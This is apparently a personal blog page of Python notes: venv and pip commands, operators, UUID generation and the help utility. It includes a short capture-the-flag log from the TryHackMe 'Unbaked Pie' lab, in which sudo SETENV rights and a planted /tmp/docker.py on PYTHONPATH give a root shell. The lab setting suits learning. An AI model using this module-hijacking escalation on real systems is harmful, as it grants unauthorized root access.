Skip to main content

Python: Notes

Python Logo

>>> Python Standard Library

python -m venv name_env : Create virtual environment 'name_env'
python -m pip install --upgrade pip : Upgrade pip (a package manager for Python)

python -m http.server 8080 -d /var/www/test : run an adhoc web server at localhost:8080

pip is a package manager for Python, which is installed by default since Python version 3.4.

pip install package_name : Install package_name
pip uninstall package_name : Uninstall package_name
pip install -r requirements.txt : install packages listed in requirements.txt file
pip list : list all installed packages

78 / 10 # 7.8 : division
78 // 10 # 7 : integer division
78 % 10 : modulo

Generate GUID

PS C:\Users\Tuyen> python -c "import uuid ; print(uuid.uuid4())"
01fcc0fc-a620-4f13-9174-c26e3e292780
PS C:\Users\Tuyen>

Get Help

PS C:\Users\Tuyen> python
Python 3.6.4 (v3.6.4:d48eceb, Dec 19 2017, 06:54:40) [MSC v.1900 64 bit (AMD64)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> help
Type help() for interactive help, or help(object) for help about object.
>>> help()

Welcome to Python 3.6's help utility!

If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://docs.python.org/3.6/tutorial/.

Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules.  To quit this help utility and
return to the interpreter, just type "quit".

To get a list of available modules, keywords, symbols, or topics, type
"modules", "keywords", "symbols", or "topics".  Each module also comes
with a one-line summary of what it does; to list the modules whose name
or summary contain a given string such as "spam", type "modules spam".

help>

Install python-jwt module for python2 on Kali Linuz WSL

pip install -t /usr/local/lib/python2.7/dist-packages/ python-jwt

Exploit python

oliver@unbaked:~$ sudo -l
Matching Defaults entries for oliver on unbaked:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User oliver may run the following commands on unbaked:
    (root) SETENV: NOPASSWD: /usr/bin/python /opt/dockerScript.py
oliver@unbaked:~$ cat /opt/dockerScript.py
import docker

# oliver, make sure to restart docker if it crashes or anything happened.
# i havent setup swap memory for it
# it is still in development, please dont let it live yet!!!
client = docker.from_env()
client.containers.run("python-django:latest", "sleep infinity", detach=True)
oliver@unbaked:~$ touch /tmp/docker.py
oliver@unbaked:~$ nano /tmp/docker.py
oliver@unbaked:~$ chmod +x /tmp/docker.py
oliver@unbaked:~$ cat /tmp/docker.py
import os
os.system("/bin/bash")
oliver@unbaked:~$
oliver@unbaked:~$ sudo PYTHONPATH=/tmp /usr/bin/python /opt/dockerScript.py
oliver@unbaked:~# id
uid=0(root) gid=0(root) groups=0(root)
oliver@unbaked:~# cat /root/root.txt
CONGRATS ON PWNING THIS BOX!
Created by ch4rm & H0j3n
ps: dont be mad us, we hope you learn something new

flag: THM{REDACTED}
oliver@unbaked:~#

Practice

>>> THM | Unbaked Pie

>>> The Zen of Python by Tim Peters

Labels:

Popular posts from this blog

IIS: Delete cached files on server running IIS

Delete cached files on server running IIS When changing css, javascript files, check to delete if IIS still caches old files in the default folder C:\inetpub\temp\IIS Temporary Compressed Files\<sitename>\$^_gzip_D^\ Apply to: IIS 8.5
Read more

Linux command: du - disk usage

Where have all my storage gone? du summarize disk usage of the set of FILEs, recursively for directories.
Read more

ManageEngine ServiceDesk Plus - Reset password

Let's reset the default administrator's password to 'admin'
Read more